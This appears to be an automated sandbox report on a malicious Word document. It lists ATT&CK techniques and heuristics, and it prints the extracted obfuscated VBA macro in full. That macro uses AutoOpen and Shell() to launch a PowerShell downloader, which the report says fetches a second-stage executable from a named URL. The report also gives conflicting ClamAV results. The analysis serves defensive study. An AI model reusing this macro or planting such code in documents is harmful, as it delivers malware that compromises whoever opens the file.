Verdict: MALICIOUS
Risk Score: 252

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro that utilizes the Shell() function to execute a command. This command constructs a PowerShell command to download a second-stage executable from the URL 'http://aionow.powershell.net/wp-content/uploads/2018/11/a.exe' and execute it. The presence of the AutoOpen macro and the critical Shell() call firing strongly indicate malicious intent.
Heuristics (9)

- ClamAV: Doc.Malware.Generic-6750018-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6750018-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script: `qCVmqlAQz = Shell(MbEDiXCnLE + uoaDjEZP + EdwGriA, fBfdNF)` / `Dim AYQRCwl, iZmvWM, WPjwwDFNc, YZLGQSrW`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script: `End Function` / `Sub AutoOpen()` / `Dim RhuuqMOYq, TlJMQZWAt, rzUAiI, PIdYFw`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6389 bytes |

SHA-256: 0e3b2f52c78290f1ccb97bf6d8a6bb3572772e94390929675a97836fbe01f945

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 59 of 95 identifiers look randomly generated (e.g. 'IwINFnGDViBi'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "IwINFnGDViBi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function TKspl()
Const fBfdNF = 385551437 - 385551437
Dim wFbBCnEXl, dEWkRraT, wlYwlcYi, oznQZ
dEWkRraT = Len(RptDMafK)
oznQZ = ""
For wFbBCnEXl = 1 To dEWkRraT
oznQZ = oznQZ & (22 + ((wlYwlcYi + 23) Mod 112))
If wlYwlcYi >= 14 And wlYwlcYi <= 79 Then
oznQZ = oznQZ & (29 + ((wlYwlcYi + 36) Mod 136))
Else
oznQZ = oznQZ & (wlYwlcYi)
End If
Next
aTFWsJX = oznQZ
Dim vicBEU, wMMji, iTQuu, bjrHr
wMMji = Len(aQjOuU)
bjrHr = ""
For vicBEU = 1 To wMMji
bjrHr = bjrHr & (30 + ((iTQuu + 11) Mod 123))
If iTQuu >= 24 And iTQuu <= 97 Then
bjrHr = bjrHr & (32 + ((iTQuu + 24) Mod 116))
Else
bjrHr = bjrHr & (iTQuu)
End If
Next
JaDBrSuYK = bjrHr
MbEDiXCnLE = "" + iJEinB + kScwWGM + Shapes("AJSJjvSPXuP").TextFrame.ContainingRange + SrFFrMa + itjctiC
Dim RbbSFTrw, zczwKZiEP, UmwdUJST, IYtvsYurA
zczwKZiEP = Len(mmNuN)
IYtvsYurA = ""
For RbbSFTrw = 1 To zczwKZiEP
IYtvsYurA = IYtvsYurA & (31 + ((UmwdUJST + 23) Mod 139))
If UmwdUJST >= 22 And UmwdUJST <= 95 Then
IYtvsYurA = IYtvsYurA & (40 + ((UmwdUJST + 21) Mod 120))
Else
IYtvsYurA = IYtvsYurA & (UmwdUJST)
End If
Next
RKvVwG = IYtvsYurA
qCVmqlAQz = Shell(MbEDiXCnLE + uoaDjEZP + EdwGriA, fBfdNF)
Dim AYQRCwl, iZmvWM, WPjwwDFNc, YZLGQSrW
iZmvWM = Len(ijzmXsqrs)
YZLGQSrW = ""
For AYQRCwl = 1 To iZmvWM
YZLGQSrW = YZLGQSrW & (31 + ((WPjwwDFNc + 36) Mod 71))
If WPjwwDFNc >= 28 And WPjwwDFNc <= 50 Then
YZLGQSrW = YZLGQSrW & (47 + ((WPjwwDFNc + 24) Mod 110))
Else
YZLGQSrW = YZLGQSrW & (WPjwwDFNc)
End If
Next
ziavK = YZLGQSrW
Dim ijqOjbi, cZttszmT, nZFcK, YMkpSD
cZttszmT = Len(mzWfE)
YMkpSD = ""
For ijqOjbi = 1 To cZttszmT
YMkpSD = YMkpSD & (41 + ((nZFcK + 28) Mod 106))
If nZFcK >= 42 And nZFcK <= 80 Then
YMkpSD = YMkpSD & (39 + ((nZFcK + 32) Mod 127))
Else
YMkpSD = YMkpSD & (nZFcK)
End If
Next
qooLdMnlv = YMkpSD
Dim oUuDiLwtK, OlpZjYR, TJIzzQz, DBzzOW
OlpZjYR = Len(TwJWEl)
DBzzOW = ""
For oUuDiLwtK = 1 To OlpZjYR
DBzzOW = DBzzOW & (36 + ((TJIzzQz + 18) Mod 193))
If TJIzzQz >= 17 And TJIzzQz <= 65 Then
DBzzOW = DBzzOW & (41 + ((TJIzzQz + 24) Mod 57))
Else
DBzzOW = DBzzOW & (TJIzzQz)
End If
Next
wwzSDqoq = DBzzOW
Dim iZaENHvZ, iOWdIEF, NpZrHa, QtMsrSj
iOWdIEF = Len(LEtSQmi)
QtMsrSj = ""
For iZaENHvZ = 1 To iOWdIEF
QtMsrSj = QtMsrSj & (19 + ((NpZrHa + 32) Mod 82))
If NpZrHa >= 16 And NpZrHa <= 70 Then
QtMsrSj = QtMsrSj & (31 + ((NpZrHa + 35) Mod 139))
Else
QtMsrSj = QtMsrSj & (NpZrHa)
End If
Next
wuZOhVOqX = QtMsrSj
End Function
Sub AutoOpen()
Dim RhuuqMOYq, TlJMQZWAt, rzUAiI, PIdYFw
TlJMQZWAt = Len(hoYarivSA)
PIdYFw = ""
For RhuuqMOYq = 1 To TlJMQZWAt
PIdYFw = PIdYFw & (21 + ((rzUAiI + 46) Mod 75))
If rzUAiI >= 25 And rzUAiI <= 70 Then
PIdYFw = PIdYFw & (20 + ((rzUAiI + 33) Mod 63))
Else
PIdYFw = PIdYFw & (rzUAiI)
End If
Next
IVFUN = PIdYFw
Dim kwuiowjiw, LjObSCw, LzwwrL, XCvSWs
LjObSCw = Len(ZbpZh)
XCvSWs = ""
For kwuiowjiw = 1 To LjObSCw
XCvSWs = XCvSWs & (29 + ((LzwwrL + 29) Mod 68))
If LzwwrL >= 44 And LzwwrL <= 85 Then
XCvSWs = XCvSWs & (27 + ((LzwwrL + 33) Mod 71))
Else
XCvSWs = XCvSWs & (LzwwrL)
End If
Next
hTWvodCzo = XCvSWs
Dim PIztN, rSVbZC, msrioi, oiODDAvT
rSVbZC = Len(iHoszVS)
oiODDAvT = ""
For PIztN = 1 To rSVbZC
oiODDAvT = oiODDAvT & (32 + ((msrioi + 45) Mod 117))
If msrioi >= 13 And msrioi <= 81 Then
oiODDAvT = oiODDAvT & (32 + ((msrioi + 48) Mod 166))
Else
oiODDAvT = oiODDAvT & (msrioi)
End If
Next
ukjKwGC = oiODDAvT
Dim wvZUJN, LhKEnCq, UfMaodz, qjLhr
LhKEnCq = Len(CwYZaY)
qjLhr = ""
For wvZUJN = 1 To LhKEnCq
qjLhr = qjLhr & (31 + ((UfMaodz + 33) Mod 128))
If UfMaodz >= 38 And UfMaodz <= 78 Then
qjLhr = qjLhr & (45 + ((UfMaodz + 16) Mod 76))
Else
qjLhr = qjLhr & (UfMaodz)
End If
Next
cJIlYsJo = qjLhr
Dim vwwjWPmY, EzrLA, KWRAVk, YcWJt
EzrLA = Len(rzzMoUW)
YcWJt = ""
For vwwjWPmY = 1 To EzrLA
YcWJt = YcWJt & (23 + ((KWRAVk + 43) Mod 100))
If KWRAVk >= 42 And KWRAVk <= 73 Then
YcWJt = YcWJt & (25 + ((KWRAVk + 18) Mod 86))
Else
YcWJt = YcWJt & (KWRAVk)
End If
Next
cCMpAa = YcWJt
Dim hwzPMT, nNfcAv, KYZzz, rXszY
nNfcAv = Len(SwcqN)
rXszY = ""
For hwzPMT = 1 To nNfcAv
rXszY = rXszY & (24 + ((KYZzz + 33) Mod 77))
If KYZzz >= 43 And KYZzz <= 72 Then
rXszY = rXszY & (33 + ((KYZzz + 16) Mod 148))
Else
rXszY = rXszY & (KYZzz)
End If
Next
fAXsn = rXszY
TKspl
Dim MbrAD, aJPziTkL, aWmrCnmD, EbUZAvm
aJPziTkL = Len(MUPaaz)
EbUZAvm = ""
For MbrAD = 1 To aJPziTkL
EbUZAvm = EbUZAvm & (45 + ((aWmrCnmD + 41) Mod 76))
If aWmrCnmD >= 24 And aWmrCnmD <= 51 Then
EbUZAvm = EbUZAvm & (11 + ((aWmrCnmD + 15) Mod 93))
Else
EbUZAvm = EbUZAvm & (aWmrCnmD)
End If
Next
FwLAi = EbUZAvm
Dim QwlLam, GnlsV, zIzmM, hRcVbw
GnlsV = Len(DhWbBRw)
hRcVbw = ""
For QwlLam = 1 To GnlsV
hRcVbw = hRcVbw & (31 + ((zIzmM + 19) Mod 187))
If zIzmM >= 15 And zIzmM <= 86 Then
hRcVbw = hRcVbw & (32 + ((zIzmM + 20) Mod 69))
Else
hRcVbw = hRcVbw & (zIzmM)
End If
Next
pHvbAor = hRcVbw
End Sub